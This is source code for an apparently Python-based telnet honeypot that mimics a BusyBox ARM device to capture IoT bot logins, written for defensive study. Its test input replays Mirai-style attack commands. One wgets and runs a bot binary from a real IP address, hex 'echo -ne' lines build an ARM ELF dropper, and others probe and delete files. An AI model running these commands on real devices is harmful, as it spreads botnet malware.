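The generated `Grammar` class above is a packrat parser: every `_read_*` rule memoizes its result per input offset in `self._cache`, so backtracking through the ordered choices never re-parses the same rule at the same position. A minimal self-contained sketch of that caching pattern (illustrative only — `MiniParser` and its grammar `list <- word ("," word)*` are hypothetical, not from this repository):

```python
from collections import defaultdict

FAILURE = object()  # sentinel for "rule did not match", as in the generated parser

class MiniParser:
    """Tiny packrat-style parser for the toy grammar: list <- word ("," word)*."""
    def __init__(self, text):
        self._input = text
        self._offset = 0
        self._cache = defaultdict(dict)  # rule name -> {offset: (result, new_offset)}

    def _memo(self, name, reader):
        start = self._offset
        cached = self._cache[name].get(start)
        if cached:                       # replay both the result and the offset
            self._offset = cached[1]
            return cached[0]
        result = reader()
        self._cache[name][start] = (result, self._offset)
        return result

    def _read_word(self):
        def reader():
            start = self._offset
            while self._offset < len(self._input) and self._input[self._offset].isalpha():
                self._offset += 1
            return self._input[start:self._offset] if self._offset > start else FAILURE
        return self._memo('word', reader)

    def parse_list(self):
        words = [self._read_word()]
        if words[0] is FAILURE:
            return FAILURE
        while self._offset < len(self._input) and self._input[self._offset] == ',':
            self._offset += 1
            word = self._read_word()
            if word is FAILURE:
                return FAILURE
            words.append(word)
        return words
```

The generated code follows the same shape, just unrolled: each `_read_*` method checks `self._cache[rule].get(index0)` on entry and stores `(address0, self._offset)` before returning.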
================================================
FILE: honeypot/shell/shell.py
================================================
import sys
import traceback
from grammar import parse, TreeNode
from commands.base import Proc
def filter_ascii(string):
string = ''.join(char for char in string if ord(char) < 128 and ord(char) > 32 or char in " ")
return string
###
ELF_BIN_ARM = "\x7fELF\x01\x01\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x00(\x00\x01\x00\x00\x00h\xc2\x00\x004\x00\x00\x00X^\x01\x00\x02\x00\x00\x054\x00 \x00\x08\x00(\x00\x1c\x00\x1b\x00\x01\x00\x00p\xc0X\x01\x00\xc0\xd8\x01\x00\xc0\xd8\x01\x00\x18\x00\x00\x00\x18\x00\x00\x00\x04\x00\x00\x00\x04\x00\x00\x00\x06\x00\x00\x004\x00\x00\x004\x80\x00\x004\x80\x00\x00\x00\x01\x00\x00\x00\x01\x00\x00\x05\x00\x00\x00\x04\x00\x00\x00\x03\x00\x00\x004\x01\x00\x004\x81\x00\x004\x81\x00\x00\x13\x00\x00\x00\x13\x00\x00\x00\x04\x00\x00\x00\x01\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x00\x00\xdcX\x01\x00\xdcX\x01\x00\x05\x00\x00\x00\x00\x80\x00\x00\x01\x00\x00\x00\xdcX\x01\x00\xdcX\x02\x00\xdcX\x02\x00\x1c\x04\x00\x00\xbc\x10\x00\x00\x06\x00\x00\x00\x00\x80\x00\x00\x02\x00\x00\x00\xe8X\x01\x00\xe8X\x02\x00\xe8X\x02\x00\x08\x01\x00\x00\x08\x01\x00\x00\x06\x00\x00\x00\x04\x00\x00\x00\x04\x00\x00\x00H\x01\x00\x00H\x81\x00\x00H\x81\x00\x00D\x00\x00\x00D\x00\x00\x00\x04\x00\x00\x00\x04\x00\x00\x00Q\xe5td\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06\x00\x00\x00\x04\x00\x00\x00/lib/ld-linux.so.3\x00\x00\x04\x00\x00\x00\x10\x00\x00\x00\x01\x00\x00\x00GNU\x00\x00\x00\x00\x00\x02\x00\x00\x00\x06\x00\x00\x00\x1b\x00\x00\x00\x04\x00\x00\x00\x14\x00\x00\x00\x03\x00\x00\x00GNU\x00\x02Tz0\x80\x94\xc2\x8e%\xf1\xa4\xad\xc7D\xa9\x91q\x94\xdb\na\x00\x00\x00\x06\x00\x00\x00 \x00\x00\x00\n\x00\x00\x00\x00I\x10\x92\x02D\x1b&@\x10@\xe0B\x00`\x00\x91AA\x10\x00r\x11\x11aH\x14(\x00\x00\x00\x00\x08\x00\x00\x80\x90\t\x00 \x08\x00*\x00@\x00$\xad\x11\x10\x81,(\x00\x00\t@J!\x91\x19\xadA\x04\x80IE\x85\x85\xf0\x88\xb3h\x80\x02H\x08\x80\x80\x00\x08\x01(d\x0e!M\xe0\xa8D\x94\x02 \x00\x08\x01\x87)\x00\x08\n\x00J\x08\x0e\x01\xc0-\x00 @\x18\x80d\xe6 
\x81\x02\x00\x89\n\x90\x00$\x0e\x8c\xb0(\x06\x00\x00\x00\x08\x00\x00\x00\t\x00\x00\x00\n\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\r\x00\x00\x00\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x11\x00\x00\x00\x12\x00\x00\x00\x15\x00\x00\x00\x00\x00\x00\x00\x17\x00\x00\x00\x19\x00\x00\x00\x1c\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x1d\x00\x00\x00\x1e\x00\x00\x00\x1f\x00\x00\x00\x00\x00\x00\x00!\x00\x00\x00%\x00\x00\x00\x00\x00\x00\x00'\x00\x00\x00)\x00\x00\x00\x00\x00\x00\x00*\x00\x00\x00,\x00\x00\x000\x00\x00\x002\x00\x00\x00\x00\x00\x00\x003\x00\x00\x00\x00\x00\x00\x006\x00\x00\x008\x00\x00\x00:\x00\x00\x00<\x00\x00\x00>\x00\x00\x00?\x00\x00\x00A\x00\x00\x00G\x00\x00\x00I\x00\x00\x00\x00\x00\x00\x00J\x00\x00\x00\x00\x00\x00\x00K\x00\x00\x00L\x00\x00\x00\x00\x00\x00\x00N\x00\x00\x00R\x00\x00\x00S\x00\x00\x00T\x00\x00\x00U\x00\x00\x00\x00\x00\x00\x00V\x00\x00\x00W\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00X\x00\x00\x00Y\x00\x00\x00Z\x00\x00\x00\\\x00\x00\x00^\x00\x00\x00`\x00\x00\x00c\x00\x00\x00d\x00\x00\x00f\x00\x00\x00h\x00\x00\x00i\x00\x00\x00k\x00\x00\x00n\x00\x00\x00q\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00t\x00\x00\x00\x00\x00\x00\x00u\x00\x00\x00v\x00\x00\x00y\x00\x00\x00z\x00\x00\x00\x00\x00\x00\x00{\x00\x00\x00\x00\x00\x00\x00}\x00\x00\x00~\x00\x00\x00\x7f\x00\x00\x00\x80\x00\x00\x00\x81\x00\x00\x00\x82\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x84\x00\x00\x00\x08,\xae\xff_\x96\x93\x1c\x03}\x1eL\xa3Z\xef\x90V\xdb\x93\x1c\xa8vbICw)\x91,2@\xfd\xda\x80A\xb7\xed\xe9C+\xf1\x81B\x84\xcf\x18L\x0fvT<\x94\xca\x96\x93\x1c\xcd?\x0c\xaf\x88j\x06\xaf\x8dm\x94\x06\x08~\x92\x1c!t\xb0\x02\xe2\xad\xc6\x1b.N=\xf6\xdb\xf7\x00^\x01\xaf4\xe8_t;\xc5"
ELF_BIN_X86 = "\x7fELF\x02\x01\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00>\x00\x01\x00\x00\x00P\x1c\x00\x00\x00\x00\x00\x00@\x00\x00\x00\x00\x00\x00\x00\xb8\x81\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00@\x008\x00\t\x00@\x00\x1c\x00\x1b\x00\x06\x00\x00\x00\x05\x00\x00\x00@\x00\x00\x00\x00\x00\x00\x00@\x00\x00\x00\x00\x00\x00\x00@\x00\x00\x00\x00\x00\x00\x00\xf8\x01\x00\x00\x00\x00\x00\x00\xf8\x01\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00\x04\x00\x00\x008\x02\x00\x00\x00\x00\x00\x008\x02\x00\x00\x00\x00\x00\x008\x02\x00\x00\x00\x00\x00\x00\x1c\x00\x00\x00\x00\x00\x00\x00\x1c\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x05\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x98m\x00\x00\x00\x00\x00\x00\x98m\x00\x00\x00\x00\x00\x00\x00\x00 \x00\x00\x00\x00\x00\x01\x00\x00\x00\x06\x00\x00\x00\xf0{\x00\x00\x00\x00\x00\x00\xf0{ \x00\x00\x00\x00\x00\xf0{ \x00\x00\x00\x00\x00\x90\x04\x00\x00\x00\x00\x00\x000\x06\x00\x00\x00\x00\x00\x00\x00\x00 \x00\x00\x00\x00\x00\x02\x00\x00\x00\x06\x00\x00\x00X|\x00\x00\x00\x00\x00\x00X| \x00\x00\x00\x00\x00X| \x00\x00\x00\x00\x00\xf0\x01\x00\x00\x00\x00\x00\x00\xf0\x01\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00\x04\x00\x00\x00T\x02\x00\x00\x00\x00\x00\x00T\x02\x00\x00\x00\x00\x00\x00T\x02\x00\x00\x00\x00\x00\x00D\x00\x00\x00\x00\x00\x00\x00D\x00\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00P\xe5td\x04\x00\x00\x00d`\x00\x00\x00\x00\x00\x00d`\x00\x00\x00\x00\x00\x00d`\x00\x00\x00\x00\x00\x00D\x02\x00\x00\x00\x00\x00\x00D\x02\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00Q\xe5td\x06\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x00\x00\x00\x00R\xe5td\x04\x00\x00\x00\xf0{\x00\x00\x00\x00\x00\x00\xf0{ \x00\x00\x00\x00\x00\xf0{ 
\x00\x00\x00\x00\x00\x10\x04\x00\x00\x00\x00\x00\x00\x10\x04\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00/lib64/ld-linux-x86-64.so.2\x00\x04\x00\x00\x00\x10\x00\x00\x00\x01\x00\x00\x00GNU\x00\x00\x00\x00\x00\x03\x00\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00\x14\x00\x00\x00\x03\x00\x00\x00GNU\x00Y\xde\xf0\x1bLK<H}\x8b\xb8\x98mI\xbeo\xf4b8w\x03\x00\x00\x005\x00\x00\x00\x02\x00\x00\x00\x07\x00\x00\x00\x12\x01\xd2$\x12)\x00V`A\x00\x0e \x00\x00\x005\x00\x00\x009\x00\x00\x00@\x00\x00\x00\x04\x8b&\xa4(\x1d\x8c\x1c\x10\x8aM#\xc9MB#\xbcPv\x9e\xacK\xe3\xc0\x96\xa0\x89\x97F-\xe4\xde\xce,cr\xe4bA\xf59\xf2\x8b\x1c*\xd4\xb8\xd3\x1c\xedc*?\x04K\x86\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x1a\x01\x00\x00\x12\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00<\x01\x00\x00\x12\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xf2\x01\x00\x00\x12\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00s\x00\x00\x00\x12\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xca\x00\x00\x00\x12\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x001\x00\x00\x00\x12\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xd9\x02\x00\x00 \x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00y\x00\x00\x00\x12\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00j\x01\x00\x00\x12\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
globalfiles = {
"/proc/mounts": """/dev/root /rom squashfs ro,relatime 0 0
proc /proc proc rw,nosuid,nodev,noexec,noatime 0 0
sysfs /sys sysfs rw,nosuid,nodev,noexec,noatime 0 0
tmpfs /tmp tmpfs rw,nosuid,nodev,noatime 0 0
/dev/mtdblock10 /overlay jffs2 rw,noatime 0 0
overlayfs:/overlay / overlay rw,noatime,lowerdir=/,upperdir=/overlay/upper,workdir=/overlay/work 0 0
tmpfs /dev tmpfs rw,nosuid,relatime,size=512k,mode=755 0 0
devpts /dev/pts devpts rw,nosuid,noexec,relatime,mode=600 0 0
debugfs /sys/kernel/debug debugfs rw,noatime 0 0\n""",
"/proc/cpuinfo": """processor : 0
model name : ARMv6-compatible processor rev 7 (v6l)
BogoMIPS : 697.95
Features : half thumb fastmult vfp edsp java tls
CPU implementer : 0x41
CPU architecture: 7
CPU variant : 0x0
CPU part : 0xb76
CPU revision : 7
Hardware : BCM2835
Revision : 000e
Serial : 0000000000000000\n""",
"/bin/echo": ELF_BIN_ARM,
"/bin/busybox": ELF_BIN_ARM
}
def instantwrite(msg):
sys.stdout.write(msg)
sys.stdout.flush()
class Env:
def __init__(self, output=instantwrite):
self.files = {}
self.deleted = []
self.events = {}
self.output = output
def write(self, string):
self.output(string)
def deleteFile(self, path):
if path in self.files:
self.deleted.append((path, self.files[path]))
del self.files[path]
def writeFile(self, path, string):
if path in self.files:
self.files[path] += string
else:
self.files[path] = string
def readFile(self, path):
if path in self.files:
return self.files[path]
elif path in globalfiles:
return globalfiles[path]
else:
return None
def listen(self, event, handler):
self.events[event] = handler
def action(self, event, data):
if event in self.events:
self.events[event](data)
else:
print("WARNING: Event '" + event + "' not registered")
def listfiles(self):
return self.files
class RedirEnv:
def __init__(self, baseenv, redir):
self.baseenv = baseenv
self.redir = redir
def write(self, string):
self.baseenv.writeFile(self.redir, string)
def deleteFile(self, path):
self.baseenv.deleteFile(path)
def writeFile(self, path, string):
self.baseenv.writeFile(path, string)
def readFile(self, path):
return self.baseenv.readFile(path)
def listen(self, event, handler):
self.baseenv.listen(event, handler)
def action(self, event, data):
self.baseenv.action(event, data)
def listfiles(self):
return self.baseenv.listfiles()
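The Env/RedirEnv pair above turns shell output redirection into method dispatch: wrapping an environment in RedirEnv reroutes `write()` into the virtual filesystem while every other operation passes through to the base environment. A minimal standalone sketch of the pattern (MiniEnv/MiniRedirEnv are hypothetical stand-ins, not honeypot imports):

```python
class MiniEnv(object):
    """Stripped-down stand-in for Env: virtual files plus captured output."""
    def __init__(self):
        self.files = {}   # virtual filesystem: path -> contents
        self.out = []     # what would have gone to the attacker's terminal
    def write(self, s):
        self.out.append(s)
    def writeFile(self, path, s):
        # append semantics, mirroring Env.writeFile
        self.files[path] = self.files.get(path, "") + s

class MiniRedirEnv(object):
    """Reroutes write() into a file, like RedirEnv for a '>' redirect."""
    def __init__(self, base, path):
        self.base = base
        self.path = path
    def write(self, s):
        self.base.writeFile(self.path, s)

env = MiniEnv()
env.write("to terminal\n")           # normal output, captured in env.out
red = MiniRedirEnv(env, "/tmp/x")
red.write("to file\n")               # redirected output lands in env.files
print(env.out)                       # ['to terminal\n']
print(env.files["/tmp/x"])           # prints the redirected text
```

This is why `Command.run` only has to swap the environment object before calling the builtin: the builtin keeps calling `env.write()` either way.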
class Command:
def __init__(self, args):
self.args = args
self.redirect_from_f = None
self.redirect_to_f = None
self.redirect_append = False
self.shell = Proc.get("exec")
def redirect_to(self, filename):
self.redirect_to_f = filename
self.redirect_append = False
def redirect_from(self, filename):
self.redirect_from_f = filename
def redirect_app(self, filename):
self.redirect_to(filename)
self.redirect_append = True
def run(self, env):
if self.isnone():
return 0
if self.redirect_to_f != None:
if not(self.redirect_append):
env.deleteFile(self.redirect_to_f)
env = RedirEnv(env, self.redirect_to_f)
return self.shell.run(env, self.args)
def isnone(self):
return len(self.args) == 0
def __str__(self):
return "cmd(" + " ".join(self.args) + ")"
class CommandList:
def __init__(self, mode, cmd1, cmd2):
self.mode = mode
self.cmd1 = cmd1
self.cmd2 = cmd2
def redirect_to(self, filename):
self.cmd1.redirect_to(filename)
self.cmd2.redirect_to(filename)
def redirect_from(self, filename):
self.cmd1.redirect_from(filename)
self.cmd2.redirect_from(filename)
def redirect_app(self, filename):
self.cmd1.redirect_app(filename)
self.cmd2.redirect_app(filename)
def run(self, env):
ret = self.cmd1.run(env)
if (self.mode == "&&"):
if (ret == 0):
return self.cmd2.run(env)
else:
return ret
elif (self.mode == "||"):
if (ret != 0):
return self.cmd2.run(env)
else:
return ret
elif (self.mode == ";"):
if self.cmd2.isnone():
return ret
return self.cmd2.run(env)
else:
print "WARN: Bad Mode"
return 1
def isnone(self):
return self.cmd1.isnone() and self.cmd2.isnone()
def __str__(self):
return "(" + str(self.cmd1) + self.mode + str(self.cmd2) + ")"
class Actions(object):
def make_arg_noquot(self, input, start, end, elements):
return input[start:end]
def make_arg_quot(self, input, start, end, elements):
return elements[1].text
def make_list(self, input, start, end, elements):
c1 = elements[0]
if len(elements[1].elements) != 0:
c2 = elements[1].elements[3]
return CommandList(";", c1, c2)
return c1
def make_single(self, input, start, end, elements):
c1 = elements[0]
if len(elements[1].elements) != 0:
c2 = elements[1].elements[3]
op = elements[1].elements[1]
return CommandList(op.text, c1, c2)
return c1
def make_pipe(self, input, start, end, elements):
c1 = elements[0]
if len(elements[1].elements) != 0:
c2 = elements[1].elements[3]
c1.redirect_to("/dev/pipe")
c2.redirect_from("/dev/pipe")
return CommandList(";", c1, c2)
return c1
def make_redir(self, input, start, end, elements):
c = elements[0]
for redirect in elements[1].elements:
operator = redirect.elements[1].text
filename = redirect.elements[3]
if operator == ">":
c.redirect_to(filename)
elif operator == ">>":
c.redirect_app(filename)
elif operator == "<":
c.redirect_from(filename)
else:
print "WARNING: unsupported redirect operator " + operator
return c
def make_cmdbrac(self, input, start, end, elements):
return elements[2]
def make_args(self, input, start, end, elements):
if isinstance(elements[0], basestring):
r = [ elements[0] ]
else:
r = []
for arg in elements[1].elements:
if isinstance(arg.elements[1], basestring):
r.append(arg.elements[1])
c = Command(r)
return c
def run(string, env):
c = parse(filter_ascii(string).strip(), actions=Actions())
return c.run(env)
def test_shell():
env = Env()
while True:
sys.stdout.write(" # ")
sys.stdout.flush()
line = sys.stdin.readline()
if line == "":
break
if line == "\n":
continue
line = line[:-1]
tree = run(line, env)
sys.stdout.flush()
================================================
FILE: honeypot/shell/test.sh
================================================
#!/bin/bash
canopy grammar.peg --lang python && python shell.py < test.txt
================================================
FILE: honeypot/shell/test.txt
================================================
cp
ls
cat
dd
rm
echo
busybox
sh
cd
true
false
chmod
uname
:
ps
enable
shell
sh
/bin/busybox ECCHI
/bin/busybox ps; /bin/busybox ECCHI
/bin/busybox cat /proc/mounts; /bin/busybox ECCHI
/bin/busybox echo -e '\x6b\x61\x6d\x69/proc' > /proc/.nippon; /bin/busybox cat /proc/.nippon; /bin/busybox rm /proc/.nippon
/bin/busybox echo -e '\x6b\x61\x6d\x69/sys' > /sys/.nippon; /bin/busybox cat /sys/.nippon; /bin/busybox rm /sys/.nippon
/bin/busybox echo -e '\x6b\x61\x6d\x69/tmp' > /tmp/.nippon; /bin/busybox cat /tmp/.nippon; /bin/busybox rm /tmp/.nippon
/bin/busybox echo -e '\x6b\x61\x6d\x69/overlay' > /overlay/.nippon; /bin/busybox cat /overlay/.nippon; /bin/busybox rm /overlay/.nippon
/bin/busybox echo -e '\x6b\x61\x6d\x69' > /.nippon; /bin/busybox cat /.nippon; /bin/busybox rm /.nippon
/bin/busybox echo -e '\x6b\x61\x6d\x69/dev' > /dev/.nippon; /bin/busybox cat /dev/.nippon; /bin/busybox rm /dev/.nippon
/bin/busybox echo -e '\x6b\x61\x6d\x69/dev/pts' > /dev/pts/.nippon; /bin/busybox cat /dev/pts/.nippon; /bin/busybox rm /dev/pts/.nippon
/bin/busybox echo -e '\x6b\x61\x6d\x69/sys/kernel/debug' > /sys/kernel/debug/.nippon; /bin/busybox cat /sys/kernel/debug/.nippon; /bin/busybox rm /sys/kernel/debug/.
/bin/busybox echo -e '\x6b\x61\x6d\x69/dev' > /dev/.nippon; /bin/busybox cat /dev/.nippon; /bin/busybox rm /dev/.nippon
/bin/busybox ECCHI
rm /proc/.t; rm /proc/.sh; rm /proc/.human
rm /sys/.t; rm /sys/.sh; rm /sys/.human
rm /tmp/.t; rm /tmp/.sh; rm /tmp/.human
rm /overlay/.t; rm /overlay/.sh; rm /overlay/.human
rm /.t; rm /.sh; rm /.human
rm /dev/.t; rm /dev/.sh; rm /dev/.human
rm /dev/pts/.t; rm /dev/pts/.sh; rm /dev/pts/.human
rm /sys/kernel/debug/.t; rm /sys/kernel/debug/.sh; rm /sys/kernel/debug/.human
rm /dev/.t; rm /dev/.sh; rm /dev/.human
cd /proc/
/bin/busybox cp /bin/echo dvrpelper; >dvrpelper; /bin/busybox chmod 777 dvrpelper; /bin/busybox ECCHI
/bin/busybox cat /bin/echo
/bin/busybox ECCHI
/bin/busybox wget; /bin/busybox tftp; /bin/busybox ECCHI
/bin/busybox wget http://95.215.60.17:80/bins/miraint.x86 -O - > dvrpelper; /bin/busybox chmod 777 dvrpelper; /bin/busybox ECCHI
./dvrpelper telnet.x86.bot.wget; /bin/busybox IHCCE
rm -rf upnp; > dvrpelper; /bin/busybox ECCHI
cat /proc/mounts; (/bin/busybox DFYHE || :)
echo -ne "\x7f\x45\x4c\x46\x01\x01\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x00\x28\x00\x01\x00\x00\x00\x54\x00\x01\x00\x34\x00\x00\x00\x40\x01\x00\x00\x00\x02\x00\x05\x34\x00\x20\x00\x01\x00\x28\x00\x04\x00\x03\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00" >> .s
echo -ne "\x00\x00\x01\x00\xf8\x00\x00\x00\xf8\x00\x00\x00\x05\x00\x00\x00\x00\x00\x01\x00\x02\x00\xa0\xe3\x01\x10\xa0\xe3\x06\x20\xa0\xe3\x07\x00\x2d\xe9\x01\x00\xa0\xe3\x0d\x10\xa0\xe1\x66\x00\x90\xef\x0c\xd0\x8d\xe2\x00\x60\xa0\xe1\x70\x10\x8f\xe2\x10\x20\xa0\xe3" >> .s
echo -ne "\x07\x00\x2d\xe9\x03\x00\xa0\xe3\x0d\x10\xa0\xe1\x66\x00\x90\xef\x14\xd0\x8d\xe2\x4f\x4f\x4d\xe2\x05\x50\x45\xe0\x06\x00\xa0\xe1\x04\x10\xa0\xe1\x4b\x2f\xa0\xe3\x01\x3c\xa0\xe3\x0f\x00\x2d\xe9\x0a\x00\xa0\xe3\x0d\x10\xa0\xe1\x66\x00\x90\xef\x10\xd0\x8d\xe2" >> .s
echo -ne "\x00\x50\x85\xe0\x00\x00\x50\xe3\x04\x00\x00\xda\x00\x20\xa0\xe1\x01\x00\xa0\xe3\x04\x10\xa0\xe1\x04\x00\x90\xef\xee\xff\xff\xea\x4f\xdf\x8d\xe2\x00\x00\x40\xe0\x01\x70\xa0\xe3\x00\x00\x00\xef\x02\x00\x68\xab\xb1\x67\xe2\xc5\x41\x26\x00\x00\x00\x61\x65\x61" >> .s
echo -ne "\x62\x69\x00\x01\x1c\x00\x00\x00\x05\x43\x6f\x72\x74\x65\x78\x2d\x41\x35\x00\x06\x0a\x07\x41\x08\x01\x09\x02\x2a\x01\x44\x01\x00\x2e\x73\x68\x73\x74\x72\x74\x61\x62\x00\x2e\x74\x65\x78\x74\x00\x2e\x41\x52\x4d\x2e\x61\x74\x74\x72\x69\x62\x75\x74\x65\x73\x00" >> .s
echo -ne "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0b\x00\x00\x00\x01\x00\x00\x00\x06\x00\x00\x00\x54\x00\x01\x00\x54\x00\x00\x00\xa4\x00\x00\x00" >> .s
echo -ne "\x00\x00\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x11\x00\x00\x00\x03\x00\x00\x70\x00\x00\x00\x00\x00\x00\x00\x00\xf8\x00\x00\x00\x27\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x03\x00\x00\x00" >> .s
echo -ne "\x00\x00\x00\x00\x00\x00\x00\x00\x1f\x01\x00\x00\x21\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00" >> .s
cat .s
/bin/busybox wget; /bin/busybox 81c46036wget; /bin/busybox echo -ne '\x0181c46036\x7f'; /bin/busybox printf '\00281c46036\177'; /bin/echo -ne '\x0381c46036\x7f'; /usr/bin/printf '\00481c46036\177'; /bin/busybox tftp; /bin/busybox 81c46036tftp;
================================================
FILE: honeypot/telnet.py
================================================
import struct
import socket
import traceback
import time
from thread import start_new_thread
from session import Session
from util.dbg import dbg
from util.config import config
class IPFilter:
def __init__(self):
self.map = {}
self.timeout = config.get("telnet_ip_min_time_between_connections")
def add_ip(self, ip):
self.map[ip] = time.time()
def is_allowed(self, ip):
self.clean()
return not(ip in self.map)
def clean(self):
todelete = []
for ip in self.map:
if self.map[ip] + self.timeout < time.time():
todelete.append(ip)
for ip in todelete:
del self.map[ip]
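IPFilter rate-limits by remembering the timestamp of the last accepted connection per IP and purging entries older than the configured window. A standalone sketch of that logic (MiniIPFilter is a hypothetical re-creation; the 0.1-second window is only for the demo, the real value comes from `telnet_ip_min_time_between_connections`):

```python
import time

class MiniIPFilter(object):
    """Sketch of IPFilter: at most one connection per IP per window."""
    def __init__(self, timeout):
        self.map = {}          # ip -> time of last accepted connection
        self.timeout = timeout
    def add_ip(self, ip):
        self.map[ip] = time.time()
    def is_allowed(self, ip):
        self.clean()
        return ip not in self.map
    def clean(self):
        # drop entries whose window has elapsed
        now = time.time()
        for ip in [k for k, t in self.map.items() if t + self.timeout < now]:
            del self.map[ip]

f = MiniIPFilter(0.1)           # 0.1 s window, demo only
print(f.is_allowed("1.2.3.4"))  # True: never seen before
f.add_ip("1.2.3.4")
print(f.is_allowed("1.2.3.4"))  # False: still inside the window
time.sleep(0.15)
print(f.is_allowed("1.2.3.4"))  # True: the entry expired
```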
class Telnetd:
cmds = {}
cmds[240] = "SE - subnegoation end"
cmds[241] = "NOP - no operation"
cmds[242] = "DM - data mark"
cmds[243] = "BRK - break"
cmds[244] = "IP - interrupt process"
cmds[245] = "AO - abort output"
cmds[246] = "AYT - are you there"
cmds[247] = "EC - erase char"
cmds[248] = "EL - erase line"
cmds[249] = "GA - go ahead"
cmds[250] = "SB - subnegotiation"
cmds[251] = "WILL - positive return"
cmds[252] = "WONT - negative return"
cmds[253] = "DO - set option"
cmds[254] = "DONT - unset option"
cmds[255] = "IAC - interpret as command"
SE = 240
NOP = 241
DM = 242
BRK = 243
IP = 244
AO = 245
AYT = 246
EC = 247
EL = 248
GA = 249
SB = 250
WILL = 251
WONT = 252
DO = 253
DONT = 254
IAC = 255
# Options
NAWS = 31
def __init__(self, addr, port):
self.host = addr
self.port = port
self.sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.do_run = True
self.ipfilter = IPFilter()
def run(self):
self.sock.bind((self.host, self.port))
self.sock.listen(10)
self.sock.settimeout(None)
dbg("Socket open on " + str(self.host) + ":" + str(self.port))
while self.do_run:
try:
self.handle()
except:
traceback.print_exc()
self.sock.close()
dbg("Socket Closed")
def handle(self):
conn = False
try:
conn, addr = self.sock.accept()
dbg("Client connected at " + str(addr))
if self.ipfilter.is_allowed(addr[0]):
self.ipfilter.add_ip(addr[0])
sess = TelnetSess(self, conn, addr)
start_new_thread(sess.loop, ())
else:
dbg("Connection limit for " + addr[0] + " exceeded, closing")
conn.close()
except:
traceback.print_exc()
def stop(self):
self.do_run = False
class TelnetSess:
def __init__(self, serv, sock, remote):
self.serv = serv
self.sock = sock
self.timeout = config.get("telnet_session_timeout")
self.maxtime = config.get("telnet_max_session_length")
self.db_id = 0
self.remote = remote
self.session = None
def loop(self):
self.session = Session(self.send_string, self.remote[0])
dbg("Setting timeout to " + str(self.timeout) + " seconds")
self.sock.settimeout(self.timeout)
try:
self.test_opt(1)  # IAC DO ECHO
# Kill off the session if it runs longer than self.maxtime
ts_start = int(time.time())
self.send_string("Login: ")
u = self.recv_line()
self.send_string("Password: ")
p = self.recv_line()
self.send_string("\r\nWelcome to EmbyLinux 3.13.0-24-generic\r\n")
self.session.login(u, p)
while True:
l = self.recv_line()
try:
self.session.shell(l)
except:
traceback.print_exc()
self.send_string("sh: error\r\n")
if ts_start + self.maxtime < int(time.time()):
dbg("Session too long. Killing off.")
break
except socket.timeout:
dbg("Connection timed out")
except EOFError:
dbg("Connection closed")
self.session.end()
self.sock.close()
def test_naws(self):
    # Ask for the client's window size (IAC DO NAWS), then parse the
    # reply: IAC WILL NAWS followed by the subnegotiation, or IAC WONT NAWS.
    self.test_opt(Telnetd.NAWS)
    self.need(Telnetd.IAC)
    byte = self.recv()
    self.need(Telnetd.NAWS)
    if byte == Telnetd.WILL:
        self.need(Telnetd.IAC)
